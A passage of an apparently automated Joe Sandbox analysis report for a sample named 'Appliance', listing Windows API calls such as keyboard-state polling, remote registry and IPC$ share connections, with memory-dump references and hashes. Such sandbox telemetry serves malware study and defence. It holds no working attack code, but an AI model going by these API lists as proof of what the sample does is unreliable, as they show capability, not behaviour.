                                                                                                                                              • Part of subcall function 00DC19CD: GetAsyncKeyState.USER32(00000001), ref: 00DC1A23
                                                                                                                                              • Part of subcall function 00DC19CD: GetAsyncKeyState.USER32(00000002), ref: 00DC1A3D
                                                                                                                                            • ImageList_DragLeave.COMCTL32(00000000,00000000,00000001,?), ref: 00E595C7
                                                                                                                                            • ImageList_EndDrag.COMCTL32 ref: 00E595CD
                                                                                                                                            • ReleaseCapture.USER32 ref: 00E595D3
                                                                                                                                            • SetWindowTextW.USER32(?,00000000), ref: 00E5966E
                                                                                                                                            • SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 00E59681
                                                                                                                                            • DefDlgProcW.USER32(?,00000202,?,?,00000000,00000001,?), ref: 00E5975B
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: AsyncDragImageList_StateWindow$CaptureClientCursorLeaveLongMessageProcReleaseScreenSendText
                                                                                                                                            • String ID: @GUI_DRAGFILE$@GUI_DROPID$($(
                                                                                                                                            • API String ID: 1924731296-3832140312
                                                                                                                                            • Opcode ID: 5fde4bf8db1850296798129adf0f1d163b1fac0dc4b8ce205820d1fa9f8404f6
                                                                                                                                            • Instruction ID: ce33317bef85f3491f632d1ed1f352d243b4533405643798ec7acba8401ead55
                                                                                                                                            • Opcode Fuzzy Hash: 5fde4bf8db1850296798129adf0f1d163b1fac0dc4b8ce205820d1fa9f8404f6
                                                                                                                                            • Instruction Fuzzy Hash: DC51B170104300AFDB14EF21CC56FAA77E4FB88715F40191EF996A72E2DB709908CB62
                                                                                                                                            APIs
                                                                                                                                            • GetModuleHandleW.KERNEL32(00000000,?,00000FFF,00000000,00000001,00000000,?,00E10D31,00000001,0000138C,00000001,00000000,00000001,?,00E3EEAE,00E92430), ref: 00E2A091
                                                                                                                                            • LoadStringW.USER32(00000000,?,00E10D31,00000001), ref: 00E2A09A
                                                                                                                                              • Part of subcall function 00DCB329: _wcslen.LIBCMT ref: 00DCB333
                                                                                                                                            • GetModuleHandleW.KERNEL32(00000000,00000001,?,00000FFF,?,?,00E10D31,00000001,0000138C,00000001,00000000,00000001,?,00E3EEAE,00E92430,?), ref: 00E2A0BC
                                                                                                                                            • LoadStringW.USER32(00000000,?,00E10D31,00000001), ref: 00E2A0BF
                                                                                                                                            • MessageBoxW.USER32(00000000,?,?,00011010), ref: 00E2A1E0
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: HandleLoadModuleString$Message_wcslen
                                                                                                                                            • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
                                                                                                                                            • API String ID: 747408836-2268648507
                                                                                                                                            • Opcode ID: c63962524f15e8a121304e3163f6b8969b102fc5fe68c010786544739b2e31ea
                                                                                                                                            • Instruction ID: c227463e2293bcc346be2d4138f4fdf82ba5ccf7a0cff4d1f61d9c2718ca8def
                                                                                                                                            • Opcode Fuzzy Hash: c63962524f15e8a121304e3163f6b8969b102fc5fe68c010786544739b2e31ea
                                                                                                                                            • Instruction Fuzzy Hash: 1B41FB7280021AABCB15EBE0DD46EEEB779EF14311F500469B506B2092EB65AF49CB71
                                                                                                                                            APIs
                                                                                                                                              • Part of subcall function 00DC8577: _wcslen.LIBCMT ref: 00DC858A
                                                                                                                                            • WNetAddConnection2W.MPR(?,?,?,00000000), ref: 00E21093
                                                                                                                                            • RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 00E210AF
                                                                                                                                            • RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,SOFTWARE\Classes\), ref: 00E210CB
                                                                                                                                            • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?,?,SOFTWARE\Classes\), ref: 00E210F5
                                                                                                                                            • CLSIDFromString.OLE32(?,000001FE,?,SOFTWARE\Classes\), ref: 00E2111D
                                                                                                                                            • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00E21128
                                                                                                                                            • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00E2112D
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_wcslen
                                                                                                                                            • String ID: SOFTWARE\Classes\$\CLSID$\IPC$
                                                                                                                                            • API String ID: 323675364-22481851
                                                                                                                                            • Opcode ID: 426177a98244125b0a0203fb3c638c7cb6ee0940af827e32c4f1bb6176f4eee4
                                                                                                                                            • Instruction ID: bae8a2476ccc28085ad5d3c4f757c882c0576f2f3402ff44acb7bbba41d6e691
                                                                                                                                            • Opcode Fuzzy Hash: 426177a98244125b0a0203fb3c638c7cb6ee0940af827e32c4f1bb6176f4eee4
                                                                                                                                            • Instruction Fuzzy Hash: 9D41F872C10229AFCB25EBA4EC45EEEB779FF14754F004169E905B31A0EB719E45CB60
                                                                                                                                            APIs
                                                                                                                                            • MoveWindow.USER32(?,?,?,000000FF,000000FF,00000000,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?), ref: 00E54AD9
                                                                                                                                            • CreateCompatibleDC.GDI32(00000000), ref: 00E54AE0
                                                                                                                                            • SendMessageW.USER32(?,00000173,00000000,00000000), ref: 00E54AF3
                                                                                                                                            • SelectObject.GDI32(00000000,00000000), ref: 00E54AFB
                                                                                                                                            • GetPixel.GDI32(00000000,00000000,00000000), ref: 00E54B06
                                                                                                                                            • DeleteDC.GDI32(00000000), ref: 00E54B10
                                                                                                                                            • GetWindowLongW.USER32(?,000000EC), ref: 00E54B1A
                                                                                                                                            • SetLayeredWindowAttributes.USER32(?,?,00000000,00000001,?,00000000,?), ref: 00E54B30
                                                                                                                                            • DestroyWindow.USER32(?,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?,?,00000000,00000000,?), ref: 00E54B3C
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Window$AttributesCompatibleCreateDeleteDestroyLayeredLongMessageMoveObjectPixelSelectSend
                                                                                                                                            • String ID: static
                                                                                                                                            • API String ID: 2559357485-2160076837
                                                                                                                                            • Opcode ID: 23f2439c4940319daf29c5e35d87e9a83d03919bb8802e5dcf79a7233d1993d5
                                                                                                                                            • Instruction ID: 9ac32a1ee6df61850e62dfee27f45ace12b6a2e652b60953d02c4dc0c9f7a5f4
                                                                                                                                            • Opcode Fuzzy Hash: 23f2439c4940319daf29c5e35d87e9a83d03919bb8802e5dcf79a7233d1993d5
                                                                                                                                            • Instruction Fuzzy Hash: F2317C71100209AFDF229F65CC08FDA3BA9EF0932AF110611FA14B20A0D735D894DBA4
                                                                                                                                            APIs
                                                                                                                                            • LoadIconW.USER32(00000000,00007F03), ref: 00E2D1BE
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: IconLoad
                                                                                                                                            • String ID: \+$\+$`+$blank$info$question$stop$warning
                                                                                                                                            • API String ID: 2457776203-3382907240
                                                                                                                                            • Opcode ID: 41a9324751183f1833bfc01b08b2e04989130a732a63eaa73a7cfbf8211485b1
                                                                                                                                            • Instruction ID: 680ca1b2344db5749ffd67d7e7c1b9a79788c01b84486938f2f5eca65ab976f9
                                                                                                                                            • Opcode Fuzzy Hash: 41a9324751183f1833bfc01b08b2e04989130a732a63eaa73a7cfbf8211485b1
                                                                                                                                            • Instruction Fuzzy Hash: 85113A3164D326BEE7046B15FC82EAA77ACDF05765B20102AF749B65C1D7F19A108270
                                                                                                                                            APIs
                                                                                                                                            • VariantInit.OLEAUT32(?), ref: 00E446B9
                                                                                                                                            • CoInitialize.OLE32(00000000), ref: 00E446E7
                                                                                                                                            • CoUninitialize.OLE32 ref: 00E446F1
                                                                                                                                            • _wcslen.LIBCMT ref: 00E4478A
                                                                                                                                            • GetRunningObjectTable.OLE32(00000000,?), ref: 00E4480E
                                                                                                                                            • SetErrorMode.KERNEL32(00000001,00000029), ref: 00E44932
                                                                                                                                            • CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002,?,00000001,?), ref: 00E4496B
                                                                                                                                            • CoGetObject.OLE32(?,00000000,00E60B64,?), ref: 00E4498A
                                                                                                                                            • SetErrorMode.KERNEL32(00000000), ref: 00E4499D
                                                                                                                                            • SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 00E44A21
                                                                                                                                            • VariantClear.OLEAUT32(?), ref: 00E44A35
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize_wcslen
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 429561992-0
                                                                                                                                            • Opcode ID: fea59e29f4c05fa4a252c70aaa59c50d47558af4b5e4a1afc5fcaa7b001cf73a
                                                                                                                                            • Instruction ID: b334e1542d6a24495f0309e45805f262dd1fdc21d9a3fe1e1e34104440fd5725
                                                                                                                                            • Opcode Fuzzy Hash: fea59e29f4c05fa4a252c70aaa59c50d47558af4b5e4a1afc5fcaa7b001cf73a
                                                                                                                                            • Instruction Fuzzy Hash: 93C147B16083019FC704DF68D884A6BB7E9FF89748F10591DF989AB291DB31ED05CB62
                                                                                                                                            APIs
                                                                                                                                            • CoInitialize.OLE32(00000000), ref: 00E38538
                                                                                                                                            • SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 00E385D4
                                                                                                                                            • SHGetDesktopFolder.SHELL32(?), ref: 00E385E8
                                                                                                                                            • CoCreateInstance.OLE32(00E60CD4,00000000,00000001,00E87E8C,?), ref: 00E38634
                                                                                                                                            • SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 00E386B9
                                                                                                                                            • CoTaskMemFree.OLE32(?,?), ref: 00E38711
                                                                                                                                            • SHBrowseForFolderW.SHELL32(?), ref: 00E3879C
                                                                                                                                            • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 00E387BF
                                                                                                                                            • CoTaskMemFree.OLE32(00000000), ref: 00E387C6
                                                                                                                                            • CoTaskMemFree.OLE32(00000000), ref: 00E3881B
                                                                                                                                            • CoUninitialize.OLE32 ref: 00E38821
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2762341140-0
                                                                                                                                            • Opcode ID: e11397c956041f803245be984a8aff4ef9c1a477875c888f1611287fbb494d83
                                                                                                                                            • Instruction ID: 5e7ae8ac1e0590c836341b040efc0a61cc382c5cc125d35121e02b524bcf039b
                                                                                                                                            • Opcode Fuzzy Hash: e11397c956041f803245be984a8aff4ef9c1a477875c888f1611287fbb494d83
                                                                                                                                            • Instruction Fuzzy Hash: D7C10975A00205AFCB14DFA4C988DAEBBB9FF48304F148599F519EB261DB31ED45CBA0
                                                                                                                                            APIs
                                                                                                                                            • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,?,?), ref: 00E2039F
                                                                                                                                            • SafeArrayAllocData.OLEAUT32(?), ref: 00E203F8
                                                                                                                                            • VariantInit.OLEAUT32(?), ref: 00E2040A
                                                                                                                                            • SafeArrayAccessData.OLEAUT32(?,?), ref: 00E2042A
                                                                                                                                            • VariantCopy.OLEAUT32(?,?), ref: 00E2047D
                                                                                                                                            • SafeArrayUnaccessData.OLEAUT32(?), ref: 00E20491
                                                                                                                                            • VariantClear.OLEAUT32(?), ref: 00E204A6
                                                                                                                                            • SafeArrayDestroyData.OLEAUT32(?), ref: 00E204B3
                                                                                                                                            • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00E204BC
                                                                                                                                            • VariantClear.OLEAUT32(?), ref: 00E204CE
                                                                                                                                            • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00E204D9
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2706829360-0
                                                                                                                                            • Opcode ID: 469a754e75d6a2926d733f194a8465f432d366c401759377d8a793a319daa777
                                                                                                                                            • Instruction ID: e78a26932472d34bf945e75c43506fc2941f58dceb17174a189e43d708c6e3c9
                                                                                                                                            • Opcode Fuzzy Hash: 469a754e75d6a2926d733f194a8465f432d366c401759377d8a793a319daa777
                                                                                                                                            • Instruction Fuzzy Hash: EC417071A04229DFCB14EFA5DC449EE7BB9FF08355F008429E965B7262CB30A945CFA0
                                                                                                                                            APIs
                                                                                                                                            • GetKeyboardState.USER32(?), ref: 00E2A65D
                                                                                                                                            • GetAsyncKeyState.USER32(000000A0), ref: 00E2A6DE
                                                                                                                                            • GetKeyState.USER32(000000A0), ref: 00E2A6F9
                                                                                                                                            • GetAsyncKeyState.USER32(000000A1), ref: 00E2A713
                                                                                                                                            • GetKeyState.USER32(000000A1), ref: 00E2A728
                                                                                                                                            • GetAsyncKeyState.USER32(00000011), ref: 00E2A740
                                                                                                                                            • GetKeyState.USER32(00000011), ref: 00E2A752
                                                                                                                                            • GetAsyncKeyState.USER32(00000012), ref: 00E2A76A
                                                                                                                                            • GetKeyState.USER32(00000012), ref: 00E2A77C
                                                                                                                                            • GetAsyncKeyState.USER32(0000005B), ref: 00E2A794
                                                                                                                                            • GetKeyState.USER32(0000005B), ref: 00E2A7A6
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: State$Async$Keyboard
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 541375521-0
                                                                                                                                            • Opcode ID: 3321a55e98e698ee0c53c9c0749e9caebcbf52807a0691712181e2cbb79cfdbb
                                                                                                                                            • Instruction ID: 05022a9e7fdcec26ff8afb28fa2fe77da0f630e4aadb1c425b03a8f3153487b4
                                                                                                                                            • Opcode Fuzzy Hash: 3321a55e98e698ee0c53c9c0749e9caebcbf52807a0691712181e2cbb79cfdbb
                                                                                                                                            • Instruction Fuzzy Hash: F841D6645047DA6FFF319760E8043A5BEB06B1130CF0C947AD5C67A1C2EB9499C8CBA7
                                                                                                                                            APIs
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: _wcslen$BuffCharLower
                                                                                                                                            • String ID: cdecl$none$stdcall$winapi
                                                                                                                                            • API String ID: 707087890-567219261
                                                                                                                                            • Opcode ID: 96768b999c9c5c113b31764f4790e8726d3479b7a00c50959b0e2d14c123ac3c
                                                                                                                                            • Instruction ID: 42a2cff51bf0319eabed7908b12c9582b01afe8399c93ba8d60f7212e377205f
                                                                                                                                            • Opcode Fuzzy Hash: 96768b999c9c5c113b31764f4790e8726d3479b7a00c50959b0e2d14c123ac3c
                                                                                                                                            • Instruction Fuzzy Hash: 7251D531A001169BCF14DF6CD9419BFB3A1FF59368B20522AE966F7286DB31DD41C7A0
                                                                                                                                            APIs
                                                                                                                                            • CoInitialize.OLE32 ref: 00E441D1
                                                                                                                                            • CoUninitialize.OLE32 ref: 00E441DC
                                                                                                                                            • CoCreateInstance.OLE32(?,00000000,00000017,00E60B44,?), ref: 00E44236
                                                                                                                                            • IIDFromString.OLE32(?,?), ref: 00E442A9
                                                                                                                                            • VariantInit.OLEAUT32(?), ref: 00E44341
                                                                                                                                            • VariantClear.OLEAUT32(?), ref: 00E44393
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize
                                                                                                                                            • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                                                                                                                                            • API String ID: 636576611-1287834457
                                                                                                                                            • Opcode ID: e02133413ab5c84fd7ef08cec4f5dcebce18cd623f9c2ab3f503db0f2aa52940
                                                                                                                                            • Instruction ID: 3359bed208971740bc1f7cf6842e882444f4ce8a7755ecda639e585c9978895f
                                                                                                                                            • Opcode Fuzzy Hash: e02133413ab5c84fd7ef08cec4f5dcebce18cd623f9c2ab3f503db0f2aa52940
                                                                                                                                            • Instruction Fuzzy Hash: F461AFB17083019FD314DF65E849F5ABBE4EF49714F001909F985AB2A1C770ED48CBA6
                                                                                                                                            APIs
                                                                                                                                            • GetLocalTime.KERNEL32(?), ref: 00E38C9C
                                                                                                                                            • SystemTimeToFileTime.KERNEL32(?,?), ref: 00E38CAC
                                                                                                                                            • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 00E38CB8
                                                                                                                                            • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00E38D55
                                                                                                                                            • SetCurrentDirectoryW.KERNEL32(?), ref: 00E38D69
                                                                                                                                            • SetCurrentDirectoryW.KERNEL32(?), ref: 00E38D9B
                                                                                                                                            • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 00E38DD1
                                                                                                                                            • SetCurrentDirectoryW.KERNEL32(?), ref: 00E38DDA
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: CurrentDirectoryTime$File$Local$System
                                                                                                                                            • String ID: *.*
                                                                                                                                            • API String ID: 1464919966-438819550
                                                                                                                                            • Opcode ID: 68cf9d63d9e6141d36ee3f0bc3a94f14c7d0a63cb0e92791c30db88d309fca29
                                                                                                                                            • Instruction ID: 0a6e35ecd3a3a3a69d7490337fecc57e10178a0e39bade0085625365767c6bf4
                                                                                                                                            • Opcode Fuzzy Hash: 68cf9d63d9e6141d36ee3f0bc3a94f14c7d0a63cb0e92791c30db88d309fca29
                                                                                                                                            • Instruction Fuzzy Hash: 20617AB25043059FCB10EF60C944E9EB7E8FF98314F04592EF989A7251DB31E945CBA2
                                                                                                                                            APIs
                                                                                                                                            • ShowWindow.USER32(FFFFFFFF,000000FF,?,00000000,?,00E039E2,00000004,00000000,00000000), ref: 00DDFC41
                                                                                                                                            • ShowWindow.USER32(FFFFFFFF,00000006,?,00000000,?,00E039E2,00000004,00000000,00000000), ref: 00E1FC15
                                                                                                                                            • ShowWindow.USER32(FFFFFFFF,000000FF,?,00000000,?,00E039E2,00000004,00000000,00000000), ref: 00E1FC98
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
